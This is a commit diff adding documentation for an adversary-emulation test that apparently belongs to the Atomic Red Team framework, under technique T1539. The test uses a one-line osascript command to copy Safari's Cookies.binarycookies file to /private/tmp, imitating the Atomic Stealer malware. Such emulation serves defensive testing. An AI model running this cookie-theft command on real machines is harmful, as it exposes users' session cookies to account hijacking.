Generated docs from job=generate-docs branch=master [ci skip]

atomics/T1539/T1539.md

@@ -20,6 +20,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
 
 - [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
 
+- [Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript](#atomic-test-5---copy-safari-binarycookies-files-using-applescript)
+
 
 <br/>
 
@@ -261,4 +263,41 @@ Stop-Process $chromeProcess -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript
+This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** e57ba07b-3a33-40cd-a892-748273b9b49a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
+```
+
+#### Cleanup Commands:
+```sh
+rm "#{destination_path}/Cookies.binarycookies"
+```
+
+
+
+
+
 <br/>

atomics/T1539/T1539.yaml

@@ -161,6 +161,7 @@ atomic_tests:
     elevation_required: false
 
 - name: Copy Safari BinaryCookies files using AppleScript
+  auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
   description: |
     This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
   supported_platforms: